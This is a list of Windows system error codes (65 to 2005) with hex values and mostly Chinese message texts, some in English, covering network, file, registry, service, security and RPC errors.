65 0x0041 拒绝存取网络。
66 0x0042 网络资源类型错误。
67 0x0043 网络名称找不到。
68 0x0044 超过区域电脑网卡的名称限制。
69 0x0045 超过网络BIOS操作阶段的限制。
70 0x0046 远端服务器已经暂停或者正在起始中。
71 0x0047 由于连接数目已达上限,此时无法再连接到这台远端电脑。
72 0x0048 指定的打印机或磁盘装置已经暂停作用。
80 0x0050 文件已经存在。
82 0x0052 无法建立目录或文件。
83 0x0053 INT24失败
84 0x0054 处理这项要求的储存体无法使用。
85 0x0055 近端装置名称已经在使用中。
86 0x0056 指定的网络密码错误。
87 0x0057 参数错误。
88 0x0058 网络发生资料写入错误。
89 0x0059 此时时系统无法执行其它行程。
100 0x0064 无法建立其它的系统semaphore。
101 0x0065 属于其它行程专用的semaphore。
102 0x0066 semaphore已经设定,而且无法关闭。
103 0x0067 无法指定semaphore 。
104 0x0068 在岔断时间无法要求专用的semaphore。
105 0x0069 此 semaphore 先前的拥有权已经结束。
106 0x006A 请将磁盘插入 %1。
107 0x006B 因为代用的磁盘尚未插入,所以程序已经停止。
108 0x006C 磁盘正在使用中或被锁定。
109 0x006D Pipe 已经中止。
110 0x006E 系统无法开启指定的装置或档案。
111 0x006F 文件名太长。
112 0x0070 硬盘空间不足。
113 0x0071 没有可用的内部文件识别字。
114 0x0072 目标内部文件识别字不正确。
117 0x0075 由应用程序所执行的IOCTL呼叫不正确。
118 0x0076 写入验证参数值不正确。
119 0x0077 系统不支持所要求的指令。
120 0x0078 此项功能仅在 Win32 模式有效。
121 0x0079 semaphore 超过逾时期间。
122 0x007A 传到系统呼叫的资料区域太小。
123 0x007B 文件名、目录名和或储存体标签语法错误。
124 0x007C 系统呼叫层次不正确。
125 0x007D 磁盘没有设定标签。
126 0x007E 找不到指定的模组。
127 0x007F 找不到指定的程序。
128 0x0080 没有子行程可供等待。
129 0x0081 %1 这个应用程序无法在 Win32 模式下执行。
130 0x0082 Attempt to use a file handle to an open disk partition for anoperation other than raw disk I/O.
131 0x0083 尝试将文件指标移至文件开头之前。
132 0x0084 无法在指定的装置或文件,设定文件指标。
133 0x0085 JOIN 或 SUBST 指令 无法用于内含事先结合过的磁盘机。
134 0x0086 尝试在已经结合的磁盘机,使用 JOIN 或 SUBST 指令。
135 0x0087 尝试在已经替换的磁盘机,使 用 JOIN 或 SUBST 指令。
136 0x0088 系统尝试删除未连结过的磁盘机的连结关系。
137 0x0089 系统尝试删除未替换过的磁盘机的替换关系。
138 0x008A 系统尝试将磁盘机结合到已经结合过之磁盘机的目录。
139 0x008B 系统尝试将磁盘机替换成已经替换过之磁盘机的目录。
140 0x008C 系统尝试将磁盘机替换成已经替换过之磁盘机的目录。
141 0x008D 系统尝试将磁盘机 SUBST 成已结合的磁盘机目录。
142 0x008E 系统此刻无法执行 JOIN 或 SUBST。
143 0x008F 系统无法将磁盘机结合或替换同一磁盘机下目录。
144 0x0090 这个目录不是根目录的子目录。
145 0x0091 目录仍有资料。
146 0x0092 指定的路径已经被替换过。
147 0x0093 资源不足,无法处理这项指令。
148 0x0094 指定的路径这时候无法使用。
149 0x0095 尝试要结合或替换的磁盘机目录,是已经替换过的目标。
150 0x0096 CONFIG.SYS 文件未指定系统追踪资讯,或是追踪功能被取消。
151 0x0097 指定的 semaphore事件 DosMuxSemWait 数目不正确。
152 0x0098 DosMuxSemWait 没有执行/设定太多的 semaphore。
153 0x0099 DosMuxSemWait 清单不正确。
154 0x009A 你所输入的储存媒体标元长度限制。
155 0x009B 无法建立其它的执行绪。
156 0x009C 接收行程拒绝接受信号。
157 0x009D 区段已经被舍弃,无法被锁定。
158 0x009E 区段已经解除锁定。
159 0x009F 执行绪识别码的地址不正确。
160 0x00A0 传到 DosExecPgm 的引数字符串不正确。
161 0x00A1 指定的路径不正确。
162 0x00A2 信号等候处理。
164 0x00A4 系统无法建立执行绪。
167 0x00A7 无法锁定文件的部份范围。
170 0x00AA 所要求的资源正在使用中。
173 0x00AD 取消范围的锁定要求不明显。
174 0x00AE 文件系统不支持自动变更锁定类型。
180 0x00B4 系统发现不正确的区段号码。
182 0x00B6 操作系统无法执行 %1。
183 0x00B7 文件已经存在,无法建立同一文件。
186 0x00BA 传送的旗号错误。
187 0x00BB 指定的系统旗号找不到。
188 0x00BC 操作系统无法执行 %1。
189 0x00BD 操作系统无法执行 %1。
190 0x00BE 操作系统无法执行 %1。
191 0x00BF 无法在 Win32 模式下执行 %1。
192 0x00C0 操作系统无法执行 %1。
193 0x00C1 %1 不是正确的 Win32 应用程序。
194 0x00C2 操作系统无法执行 %1。
195 0x00C3 操作系统无法执行 %1。
196 0x00C4 操作系统无法执行这个应用程序。
197 0x00C5 操作系统目前无法执行这个应用程序。
198 0x00C6 操作系统无法执行 %1。
199 0x00C7 操作系统无法执行这个应用程序。
200 0x00C8 程序码的区段不可以大于或等于64KB。
201 0x00C9 操作系统无法执行 %1。
202 0x00CA 操作系统无法执行 %1。
203 0x00CB 系统找不到输入的环境选项。 r
205 0x00CD 在指令子目录下,没有任何行程有信号副处理程序。
206 0x00CE 文件名称或副文件名太长。
207 0x00CF ring 2 堆迭使用中。
208 0x00D0 输入的通用文件名字元 * 或 ? 不正确,或指定太多的通用文件名字元。
209 0x00D1 所传送的信号不正确。
210 0x00D2 无法设定信号处理程序。
212 0x00D4 区段被锁定,而且无法重新配置。
214 0x00D6 附加到此程序或动态连结模组的动态连结模组太多。
215 0x00D7 Can't nest calls to LoadModule.
230 0x00E6 The pipe state is invalid.
231 0x00E7 所有的 pipe instances 都在忙碌中。
232 0x00E8 The pipe is being closed.
233 0x00E9 No process is on the other end of the pipe.
234 0x00EA 有更多可用的资料。
240 0x00F0 操作阶段被取消。
254 0x00FE 指定的延伸属性名称无效。
255 0x00FF 延伸的属性不一致。
259 0x0103 没有可用的资料。
266 0x010A 无法使用 Copy API。
267 0x010B 目录名称错误。
275 0x0113 延伸属性不适用于缓冲区。
276 0x0114 在外挂的文件系统上的延伸属性文件已经损坏。
277 0x0115 延伸属性表格档满。
278 0x0116 指定的延伸属性代码无效。
282 0x011A 外挂的这个文件系统不支持延伸属性。
288 0x0120 意图释放不属于叫用者的 mutex。
298 0x012A semaphore 传送次数过多。
299 0x012B 只完成 Read/WriteProcessMemory 的部份要求。
317 0x013D 系统找不到位于讯息文件%2中编号为0x%1的讯息。
487 0x01E7 尝试存取无效的地址。
534 0x0216 运算结果超过32位。
535 0x0217 信道的另一端有一个行程在接送资料。
536 0x0218 等候行程来开启信道的另一端。
994 0x03E2 存取延伸的属性被拒。
995 0x03E3 由于执行绪结束或应用程序要求,而异常终止 I/O操作。
996 0x03E4 重迭的 I/O 事件不是设定成通知状态。
997 0x03E5 正在处理重迭的 I/O 操作。
998 0x03E6 对记忆体位置的无效存取。
999 0x03E7 执行 inpage 操作发生错误。
1001 0x03E9 递归太深,堆迭溢出。(递归是什幺东西???????)
1002 0x03EA 视窗无法用来传送讯息。
1003 0x03EB 无法完成这项功能。
1004 0x03EC 旗号无效。
1005 0x03ED 储存媒体未含任何可辨识的文件系统。请确以载入所需的系统驱动
程序,而且该储存媒体并未损坏。
1006 0x03EE 储存该文件的外部媒体发出警告,表示该已开启文件已经无效。
1007 0x03EF 所要求的作业无法在全屏幕模式下执行。
1008 0x03F0 An attempt was made to reference a token that does not exist.
1009 0x03F1 组态系统登录数据库毁损。
1010 0x03F2 组态系统登录机码无效。
1011 0x03F3 无法开启组态系统登录机码。
1012 0x03F4 无法读取组态系统登录机码。
1013 0x03F5 无法写入组态系统登录机码。
1014 0x03F6 系统登录数据库中的一个档案必须使用记录或其它备份还原。 已经还原成功。
1015 0x03F7 系统登录毁损。其中某个档案毁损、或者该档案的 系统映对内存 内容毁损、会是档案无法复原。
1016 0x03F8 系统登录起始的 I/O 作业发生无法复原的错误。 系统登录无法读入、写出或更新,其中的一个档案 内含系统登录在内存中的内容。
1017 0x03F9 系统尝试将档案加载系统登录或将档案还原到系统登录中, 但是,指定档案的格式不是系统登录文件的格式。
1018 0x03FA 尝试在标示为删除的系统登录机码,执行不合法的操作。
1019 0x03FB 系统无法配置系统登录记录所需的空间。
1020 0x03FC 无法在已经有子机码或数值的系统登录机码建立符号连结。
1021 0x03FD 无法在临时机码下建立永久的子机码。
1022 0x03FE 变更要求的通知完成,但信息 并未透过呼叫者的缓冲区传回。呼叫者现在需要自行列举档案,找出变更的地方。
1051 0x041B 停止控制已经传送给其它服务 所依峙的一个服务。
1052 0x041C 要求的控制对此服务无效
1053 0x041D The service did not respond to the start or control request in a timely fashion. 1054 0x041E 无法建立服务的执行绪。
1055 0x041F 服务数据库被锁定。
1056 0x0420 这种服务已经在执行。
1057 0x0421 帐户名称错误或者不存在。
1058 0x0422 指定的服务暂停作用,无法激活。
1059 0x0423 指定循环服务从属关系。
1060 0x0424 指定的服务不是安装进来的服务。
1061 0x0425 该服务项目此时无法接收控制讯息。
1062 0x0426 服务尚未激活。
1063 0x0427 无法联机到服务控制程序。
1064 0x0428 处理控制要求时,发生意外状况。
1065 0x0429 指定的数据库不存在。
1066 0x042A 服务传回专属于服务的错误码。
1067 0x042B The process terminated unexpectedly.
1068 0x042C 从属服务或群组无法激活。
1069 0x042D 因为登入失败,所以没有激活服务。
1070 0x042E 在激活之后,服务在激活状态时当机。
1071 0x042F 指定服务数据库锁定无效。
1072 0x0430 指定的服务已经标示为删除。
1073 0x0431 指定的服务已经存在。
1074 0x0432 系统目前正以上一次执行成功的组态执行。
1075 0x0433 从属服务不存在,或已经标示为删除。
1076 0x0434 目前的激活已经接受上一次执行成功的 控制设定。
1077 0x0435 上一次激活之后,就没有再激活服务。
1078 0x0436 指定的名称已经用于服务名称或服务显示 名称。
1100 0x044C 已经到了磁带的最后。
1101 0x044D 到了档案标示。
1102 0x044E 遇到磁带的开头或分割区。
1103 0x044F 到了档案组的结尾。
1104 0x0450 磁带没有任何资料。
1105 0x0451 磁带无法制作分割区。
1106 0x0452 存取多重容体的新磁带时,发现目前区块大小错误。
1107 0x0453 加载磁带时,找不到磁带分割区信息。
1108 0x0454 无法锁住储存媒体退带功能。
1109 0x0455 无法解除加载储存媒体。
1110 0x0456 磁盘驱动器中的储存媒体已经变更。
1111 0x0457 已经重设 I/O 总线。
1112 0x0458 磁盘驱动器没有任何储存媒体。
1113 0x0459 目标 multi-byte code page,没有对应 Unicode 字符。
1114 0x045A 动态链接库 (DLL) 起始例程失败。
1115 0x045B 系统正在关机。
1116 0x045C 无法中止系统关机,因为没有关机的动作在进行中。
1117 0x045D 因为 I/O 装置发生错误,所以无法执行要求。
1118 0x045E 序列装置起始失败,会取消加载序列驱动程序。
1119 0x045F 无法开启装置。这个装置与其它装置共享岔断要求(IRQ)。至少已经有一个使用同一IRQ 的其它装置已经开启。
1120 0x0460 A serial I/O operation was completed by another write to the serial port. (The IOCTL_SERIAL_XOFF_COUNTER reached zero.)
1121 0x0461 因为已经过了逾时时间,所以序列 I/O 作业完成。(IOCTL_SERIAL_XOFF_COUNTER 不是零。)
1122 0x0462 在磁盘找不到任何的 ID 地址标示。
1123 0x0463 磁盘扇区 ID 字段与磁盘控制卡追踪地址 不符。
1124 0x0464 软式磁盘驱动器控制卡回报了一个软式磁盘驱动器驱动程序无法识别的错误。
1125 0x0465 软式磁盘驱动器控制卡传回与缓存器中不一致的结果。
1126 0x0466 存取硬盘失败,重试后也无法作业。
1127 0x0467 存取硬盘失败,重试后也无法作业。
1128 0x0468 存取硬盘时,必须重设磁盘控制卡,但是连重设的动作也失败。
1129 0x0469 到了磁带的最后。
1130 0x046A 可用服务器储存空间不足,无法处理这项指令。
1131 0x046B 发现潜在的死锁条件。
1132 0x046C 指定的基本地址或档案位移没有适当对齐。
1140 0x0474 尝试变更系统电源状态,但其它的应用程序或驱动程序拒绝。
1141 0x0475 系统 BIOS 无法变更系统电源状态。
1150 0x047E 指定的程序需要新的 Windows 版本。
1151 0x047F 指定的程序不是 Windows 或 MS-DOS 程序。
1152 0x0480 指定的程序已经激活,无法再激活一次。
1153 0x0481 指定的程序是为旧版的 Windows 所写的。
1154 0x0482 执行此应用程序所需的链接库档案之一毁损。
1155 0x0483 没有应用程序与此项作业的指定档案建立关联。
1156 0x0484 传送指令到应用程序发生错误。
1157 0x0485 找不到执行此应用程序所需的链接库档案。
1200 0x04B0 指定的装置名称无效。
1201 0x04B1 装置现在虽然未联机,但是它是一个记忆联机。
1202 0x04B2 尝试记忆已经记住的装置。
1203 0x04B3 提供的网络路径找不到任何网络提供程序。
1204 0x04B4 指定的网络提供程序名称错误。
1205 0x04B5 无法开启网络联机设定文件。
1206 0x04B6 网络联机设定文件坏掉。
1207 0x04B7 无法列举非容器。
1208 0x04B8 发生延伸的错误。
1209 0x04B9 指定的群组名称错误。
1210 0x04BA 指定的计算机名称错误。
1211 0x04BB 指定的事件名称错误。
1212 0x04BC 指定的网络名称错误。
1213 0x04BD 指定的服务名称错误。
1214 0x04BE 指定的网络名称错误。
1215 0x04BF 指定的资源共享名称错误。
1216 0x04C0 指定的密码错误。
1217 0x04C1 指定的讯息名称错误。
1218 0x04C2 指定的讯息目的地错误。
1219 0x04C3 所提供的条件与现有的条件组发生冲突。
1220 0x04C4 尝试与网络服务器联机,但是与该服务器的联机已经太多。
1221 0x04C5 其它网络计算机已经在使用这个工作群组或网域名称。
1222 0x04C6 网络没有显示出来或者没有激活。
1223 0x04C7 使用者已经取消作业。
1224 0x04C8 要求的作业无法在已经开启使用者对应区段的档案执行。
1225 0x04C9 远程系统拒绝网络联机。
1226 0x04CA 关闭网络联机。
1227 0x04CB 网络传输端点已经有相关连的地址。
1228 0x04CC 地址尚未有相关的网络端点。
1229 0x04CD 尝试在不存在的网络连线作业。
1230 0x04CE 在作用中的网络联机上执行无效的作业。
1231 0x04CF 无法传输到远程网络。
1232 0x04D0 无法联机到远程系统。
1233 0x04D1 远程系统不支持传输通讯协议。
1234 0x04D2 远程系统的目的地网络端点没有作何执行中的服务。
1235 0x04D3 要求已经中止。
1236 0x04D4 进端系统已经中断网络联机。
1237 0x04D5 无法完成作业,请重试。
1238 0x04D6 无法与服务器联机,原因是这个帐户已经到达同时联机数目的上限。
1239 0x04D7 尝试在这个帐户未授权的时间登入网络。
1240 0x04D8 这个帐户无法从这个地方登入网络。
1241 0x04D9 网络地址无法用于这个要求的作业。
1242 0x04DA 服务已经登记。
1243 0x04DB 指定的服务不存在。
1244 0x04DC 作业无法执行,原因是使用者尚未授权使用。
1245 0x04DD 要求的作业无法执行,原因是使用者尚未登入网络。指定的服务不存在。
1246 0x04DE 传回要求呼叫者继续工作的讯息。
1247 0x04DF 在完成起始作业之后,尝试再执行起始作业。
1248 0x04E0 没有其它的近端装置。
1300 0x0514 并未指定所有的参照权限给呼叫者。
1301 0x0515 帐户名称与安全识别码之间尚有未执行完成的联机。
1302 0x0516 此帐户并未设定特别的系统配额限制。
1303 0x0517 没有可用的加密机码。传回一个已知的加密机码。
1304 0x0518 NT 密码太复杂,无法转换成 LAN Manager 密码。传回的LAN Manager密码是一个空字符串。
1305 0x0519 修正层次不详。
1306 0x051A 表示两个修订阶层不兼容。
1307 0x051B 此安全识别码无法指定为这个对象的拥有者。
1308 0x051C 此安全识别码无法指定为主要的对象群组。
1309 0x051D An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client.
1310 0x051E 不可以关闭群组。
1311 0x051F 目前没有可登入的服务器,所以无法处理登入要求。
1312 0x0520 指定登入作业阶段不存在。该作业阶段可能已经 结束。
1313 0x0521 指定的权限不存在。
1314 0x0522 客户端未列出要求的权限。
1315 0x0523 所提供的名称格式与帐户名称不符。
1316 0x0524 指定的使用者已经存在。
1317 0x0525 指定的使用者不存在。
1318 0x0526 指定的群组已经存在。
1319 0x0527 指定的群组不存存。
1320 0x0528 指定的使用者帐户已经是指定群组的成员,或指定的群组因为内含成员而无法删除。
1321 0x0529 指定的使用者帐户不是指定的群组帐户成员。
1322 0x052A 上一次留下来的管理帐户无法关闭或 删除。
1323 0x052B 无法更新密码。所输入的密码不正确。
1324 0x052C 无法更新密码。所输入的新密码内含不符合 密码规定。
1325 0x052D 因为违反密码更新规则,所以无法更新密码。
1326 0x052E 登入失败: 无法辨识的使用者名称或密码错误。
1327 0x052F 登入失败: 使用者帐户限制。
1328 0x0530 登入失败: 违反帐户登入时间限制。
1329 0x0531 登入失败: 使用者不可登入这部计算机。
1330 0x0532 登入失败: 指定的帐户密码过期。
1331 0x0533 登入失败: 帐户目前无效。
1332 0x0534 帐户名称与帐户识别码不符。
1333 0x0535 一次要求太多的近端使用者识别码 (local user identifiers, LUIDs)。
1334 0x0536 没有可用的近端使用者识别码(local user identifiers,LUIDs)。
1335 0x0537 安全识别码的转授权部份对这个特殊用法无效。
1336 0x0538 无效的存取控制清单结构。
1337 0x0539 安全识别码结构无效。
1338 0x053A 安全叙述子结构无效。
1340 0x053C 无法建立继承的存取控制清单或存取控件目。
1341 0x053D 服务器目前无效。
1342 0x053E 服务器目前可以使用。
1343 0x053F 所提供的值是无效的识别码授权值。
1344 0x0540 没有可供安全信息更新使用的内存。
1345 0x0541 指定的属性无效,或指定的属性与整个群组的 属性不兼容。
1346 0x0542 Either a required impersonation level was not provided, or the provided impersonation level is invalid.
1347 0x0543 Cannot open an anonymous level security token.
1348 0x0544 所要求的认可信息类别无效。
1349 0x0545 The type of the token is inappropriate for its attempted use.
1350 0x0546 无法在没有相关连安全性的对象执行 安全作业。
1351 0x0547 指示无法连到 Windows NT 服务器,或网域中的对象 受到保护,所以无法撷取所需的对象。
1352 0x0548 安全帐户管理程序或区域安全授权服务器状态 不正确,所以无法执行安全作业。
1353 0x0549 网域状态错误,所以无法执行安全作业。
1354 0x054A 只有网域的主域控制器才能使用这项作业。
1355 0x054B 指定的网域不存在。
1356 0x054C 指定的网域已经存在。
1357 0x054D 尝试超过每个服务器的网域数目限制。
1358 0x054E 因为磁盘上发生严重的储存媒体错误或是数据结构毁损,所以无法完成所要求的作业。
1359 0x054F 安全帐户数据库内有内部不一致的状况。
1360 0x0550 通用的存取类型包含在某一存取屏蔽中,这个屏蔽已经对应到非通用的类型。
1361 0x0551 安全叙述子的格式不正确 (absolute or self-relative)。
1362 0x0552 所要求的动作只能给登入使用。而目前呼叫该动作的处理并未登录为登入。
1363 0x0553 无法利用已经在使用的识别码来激活新的作业阶段。
1364 0x0554 无法识别指定的确认包装。
1365 0x0555 登入作业阶段不是在与要求的作业一致的状态。
1366 0x0556 登入作业阶段识别码已经在使用中。
1367 0x0557 登入要求包含无效的登入类型值。
1368 0x0558 Unable to impersonate via a named pipe until data has been
read from that pipe.
1369 0x0559 The transaction state of a Registry subtree is incompatible
with the requested operation.
1370 0x055A 内部安全数据库毁损。
1371 0x055B 无法在内建帐户执行这项作业。
1372 0x055C 无法在这个内建的特殊群组执行这项操作。
1373 0x055D 无法在这个内建的特殊使用者执行这项作业。
1374 0x055E 因为群组目前是使用者的主要群组,所以不能 从群组移除使用者。
1375 0x055F The token is already in use as a primary token.
1376 0x0560 指定的区域群组不存在。
1377 0x0561 指定的帐户名称不是区域群组的成员。
1378 0x0562 指定的帐户名称已经是区域群组的成员。
1379 0x0563 指定的区域群组已经存在。
1380 0x0564 登入失败: 使用者无权在这部计算机以要求的 登入类型登入。
1381 0x0565 The maximum number of secrets that may be stored in a single system has been exceeded.
1382 0x0566 The length of a secret exceeds the maximum length allowed.
1383 0x0567 本区安全性授权数据库内含的资料不一致。
1384 0x0568 在登入时,使用者的安全内容累积太多的 安全识别码。
1385 0x0569 登入失败: 使用者尚未被许可在这个台脑使用要求的登入类型。
1386 0x056A 交叉加密的密码需要变更使用者的密码。
1387 0x056B 因为成员不存在,所以无法将新的成员新增到 区域群组。
1388 0x056C 因为成员的帐号类型不正确,所以无法新增到区域群组。
1389 0x056D 指定的安全 ID 太多。
1390 0x056E 需要用到交互加密的密码才能变更这个使用者的密码。
1391 0x056F 表示存取控制清单没有可继承的组件
1392 0x0570 档案或目录已毁,无法读取资料。
1393 0x0571 磁盘结构已毁无法读取。
1394 0x0572 没有指定之登入作业阶段的使用者作业阶段机码。
1395 0x0573 正在存取的服务仅授权特定数目的联机。 而目前联机数目已达上限,所以无法再建立服务联机。
1400 0x0578 窗口代码无效。
1401 0x0579 菜单识别码无效。
1402 0x057A 光标句柄无效。
1403 0x057B 加速键表格句柄无效。
1404 0x057C Invalid hook handle. 1405 0x057D 无效的多重窗口位置结构控制。
1406 0x057E 无法建立最上层的子窗口。
1407 0x057F 找不到 window class。
1408 0x0580 无效的窗口,属于其它的执行绪。
1409 0x0581 快速键已经登记。
1410 0x0582 Class 已经存在。
1411 0x0583 Class 不存在。
1412 0x0584 Class 仍然有开启的窗口。
1413 0x0585 无效的索引。
1414 0x0586 图标句柄无效。
1415 0x0587 使用专用的 DIALOG 窗口文字。
1416 0x0588 清单方块识别码找不到。
1417 0x0589 找不到任何通配字符。
1418 0x058A 执行绪 (thread) 没有开启剪贴簿。
1419 0x058B 快速键没有登记。
1420 0x058C 不是有效的对话窗口。
1421 0x058D Control ID 找不到。
1422 0x058E 清单方块的讯息无效,因为没有任何的编辑句柄。
1423 0x058F 窗口不是一个清单方块。
1424 0x0590 高度必须小于 256。
1425 0x0591 装置范围 (DC) 句柄无效。
1426 0x0592 锁定程序类型无效。
1427 0x0593 锁定程序无效。
1428 0x0594 没有模块句柄就不能设定非本区的锁定。
1429 0x0595 This hook procedure can only be set globally.
1430 0x0596 The journal hook procedure is already installed.
1431 0x0597 The hook procedure is not installed.
1432 0x0598 无效的单一选择清单方块讯息。
1433 0x0599 LB_SETCOUNT 传送到 non-lazy 清单方块。
1434 0x059A 这个清单方块不支持跳格停驻。
1435 0x059B 不可毁损由其它执行绪所建立的对象。
1436 0x059C 子窗口不能有菜单。
1437 0x059D 窗口没有系统菜单。
1438 0x059E 无效的消息框样式。
1439 0x059F 无效的 system-wide (SPI_*) 参数。
1440 0x05A0 屏幕已经锁定。
1441 0x05A1 All handles to windows in a multiple-window position structure
must have the same parent.
1442 0x05A2 窗口不是子窗口。
1443 0x05A3 GW_* 指令无效。
1444 0x05A4 执行绪识别码无效。
1445 0x05A5 无法处理多重文件接口窗口的讯息。
1446 0x05A6 即现式菜单已在作用中。
1447 0x05A7 窗口没有滚动条。
1448 0x05A8 滚动条范围不可以大于 0x7FFF。 1449 0x05A9 无法以指定的方式显示或移除窗口。
1450 0x05AA 系统资源不足,无法完成所要求的服务。
1451 0x05AB 系统资源不足,无法完成所要求的服务。
1452 0x05AC 系统资源不足,无法完成所要求的服务。
1453 0x05AD 配额不足,无法完成所要求的服务。
1454 0x05AE 配额不足,无法完成所要求的服务。
1455 0x05AF 这项作业的 paging 文件太小,无法完成作业。
1456 0x05B0 找不到菜单项目。
1500 0x05DC 事件记录文件坏掉。
1501 0x05DD 无法开启事件记录文件,因此事件记录服务没有激活。
1502 0x05DE 事件记录文件已满。
1503 0x05DF 事件记录文件已经变更。
1700 0x06A4 字符串连结错误。
1701 0x06A5 连结句柄 (binding handle) 的类型错误。
1702 0x06A6 连结句柄 (binding handle) 无效。
1703 0x06A7 不支持 RPC 通讯协议顺序。
1704 0x06A8 RPC 通讯协议顺序无效。
1705 0x06A9 字符串 universal unique identifier (UUID) 无效。
1706 0x06AA 端点格式错误。
1707 0x06AB 网络地址无效。
1708 0x06AC 找不到端点。
1709 0x06AD 逾时数值无效。
1710 0x06AE 找不到对象的 universal unique identifier (UUID)。
1711 0x06AF 对象的 universal unique identifier (UUID) 已经登记。
1712 0x06B0 类型的 universal unique identifier (UUID) 已经登记。
1713 0x06B1 RPC 服务器已经在听候。
1714 0x06B2 没有登记通讯协议顺序。
1715 0x06B3 RPC 服务器没有听候指令。
1716 0x06B4 管理员类型不详。
1717 0x06B5 接口不详。
1718 0x06B6 没有联机。
1719 0x06B7 没有通讯协议顺序。
1720 0x06B8 无法建立端点。
1721 0x06B9 资源不足,无法完成作业。
1722 0x06BA RPC 服务器无法使用。
1723 0x06BB RPC 服务器太忙,无法完成这项作业。
1724 0x06BC 网络选项无效。
1725 0x06BD 这个执行绪 (thread) 没有任何执行的远程过程调用。
1726 0x06BE 远程过程调用失败。
1727 0x06BF 远程过程调用失败,所以没有执行。
1728 0x06C0 远程过程调用 (remote procedure call,RPC) 通讯协议发生错误。
1730 0x06C2 RPC 服务器不支持转送语法。
1732 0x06C4 不支持 universal unique identifier (UUID) 的类型。
1733 0x06C5 封签 (tag) 无效。
1734 0x06C6 数组无效。
1735 0x06C7 连结中没有项目名称。
1736 0x06C8 名称语法无效。
1737 0x06C9 名称语法不被支持。
1739 0x06CB 没有任何网络地址可以用来建立全球唯一的识别码 (UUID)。
1740 0x06CC 端点重复。
1741 0x06CD 授权类型不详。
1742 0x06CE 呼叫次数的上限太小。
1743 0x06CF 字符串太长。
1744 0x06D0 找不到 RPC 通讯协议顺序。
1745 0x06D1 程序号码超出范围。
1746 0x06D2 连结中没有包含任何确认信息。
1747 0x06D3 确认服务不详。
1748 0x06D4 确认层次不详。
1749 0x06D5 安全内容无效。
1750 0x06D6 确认服务不详。
1751 0x06D7 项目无效。
1752 0x06D8 服务器端点无法执行这个作业。
1753 0x06D9 端点对应程序没有其它的端点。
1754 0x06DA 没有汇出任何的接口。
1755 0x06DB 项目名称不完整。
1756 0x06DC 版本选项无效。
1757 0x06DD 没有其它的成员。
1758 0x06DE 没有任何资料可以取消汇出。
1759 0x06DF 接口找不到。
1760 0x06E0 项目已经存在。
1761 0x06E1 项目找不到。
1762 0x06E2 名称服务无法使用。
1763 0x06E3 网络地址系列无效。
1764 0x06E4 要求的作业不受支持。
1765 0x06E5 没有可用来仿真的安全内容。
1766 0x06E6 远程过程调用 (RPC) 发生内部错误。
1767 0x06E7 RPC 服务器尝试用整数除以 0。
1768 0x06E8 RPC 服务器发生地址设定错误。
1769 0x06E9 RPC 服务器的浮点作业导致除以 0 的运算。
1770 0x06EA RPC 服务器发生浮点 underflow。 1771 0x06EB RPC 服务器发生浮点 overflow。
1772 0x06EC 清单中可供连结自动代码 的 RPC 服务器已经用完。
1773 0x06ED 无法开启字符转换表档案。
1774 0x06EE 包含字符转换表的档案少于 512 字节。
1775 0x06EF 在远程过程调用时,将空的 context 代码从 客户端传送到主计算机。
1777 0x06F1 在远程过程调用时内容处理改变。
1778 0x06F2 传送给远程过程调用的连结代码不符。
1779 0x06F3 The stub is unable to get the remote procedure call handle. 1780 0x06F4 A null reference pointer was passed to the stub.
1781 0x06F5 The enumeration value is out of range.
1782 0x06F6 字节计数太小。
1783 0x06F7 The stub received bad data.
1784 0x06F8 所提供的使用者缓冲区对要求的作业无效。
1785 0x06F9 无法辨识磁盘储存媒体。磁盘储存媒体可能还没有制作格式。
1786 0x06FA The workstation does not have a trust secret.
1787 0x06FB The SAM database on the Windows NT Server does not have a
computer account for this workstation trust relationship. 1788 0x06FC The trust relationship between the primary domain and the trusted domain failed. 1789 0x06FD The trust relationship between this workstation and the primary domain failed. 1790 0x06FE 网络登入失败。
1791 0x06FF 远程过程调用已经在这个执行绪进行中。
1792 0x0700 尝试登入,但网络登入服务尚未激活。
1793 0x0701 使用者的帐户已经过期。
1794 0x0702 The redirector is in use and cannot be unloaded.
1795 0x0703 指定的打印机驱动程序已经安装。
1796 0x0704 指定的连接埠无法识别。
1797 0x0705 打印机驱动程序无法识别。
1798 0x0706 打印处理器不详。
1799 0x0707 指定的分隔档无效。
1800 0x0708 指定的优先级无效。
1801 0x0709 打印机名称无效。
1802 0x070A 打印机已经存在。
1803 0x070B 打印机指令无效。
1804 0x070C 指定的数据类型无效。
1805 0x070D 指定的 Environment 无效。
1806 0x070E 没有其它的连结。
1807 0x070F 这是一个跨网域的信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。
1808 0x0710 这是一个计算机帐户。请使用您的全域性使用者帐户或区域性使用者帐户来存取这个服务器。
1809 0x0711 这是一个伺服端信任帐户。请用您的全域性使用者帐户或区域性使用者帐户来存取服务器。
1810 0x0712 指定的网域名称或安全识别码与网域信用信息 不符。
1811 0x0713 服务器正在使用中,无法卸载。
1812 0x0714 指定的影像档案没有有包含资源区段。
1813 0x0715 在影像文件找不到指定的资源类型。
1814 0x0716 在影像文件找不到指定的资源名称。
1815 0x0717 在影像文件找不到指定的资源语系识别码。
1816 0x0718 可用的配额不足,无法处理这项指令。
1817 0x0719 登录任何接口。
1818 0x071A 处理这项呼叫的时候,服务器发生变更。
1819 0x071B 连结代码没有包含所有必须的信息。
1820 0x071C 通讯失败。
1821 0x071D 要求的认证层次不被支持。
1822 0x071E 没有登记任何主要的名称。
1823 0x071F 指定的错误不是有效的 Windows RPC 错误码。
1824 0x0720 A UUID that is valid only on this computer has been allocated.
1825 0x0721 发生安全包装指定错误。
1826 0x0722 没有取消执行绪 (THREAD) 1827 0x0723 针对编码/译码的代码进行无效的作业。
1828 0x0724 Incompatible version of the serializing package.
1829 0x0725 不兼容的 RPC stub 版本。
1898 0x076A 找不到群组成员。
1899 0x076B 无法建立 endpoint mapper 数据库。
1900 0x076C The object universal unique identifier (UUID) is the nil UUID.
1901 0x076D 指定的项目无效。
1902 0x076E 指定窗体名称错误。
1903 0x076F 指定的窗体大小错误。
1904 0x0770 指定的打印机句柄已经在等候。
1905 0x0771 指定的打印机已经删除
1906 0x0772 打印机的状态错误。
1907 0x0773 使用者在第一次登入之前,必须先变更它的密码。
1908 0x0774 找不到这个网域的域控制器。
1909 0x0775 参照的帐户目前被锁定,无法登入。
2000 0x07D0 像素格式无效。
2001 0x07D1 指定的驱动程序无效。
2002 0x07D2 窗口样式或 class 属性对这项作业无效。
2003 0x07D3 不支持所要求的中继文件作业。
2004 0x07D4 不支持要求的传输作业。
2005 0x07D5 不支持要求的剪辑作业。
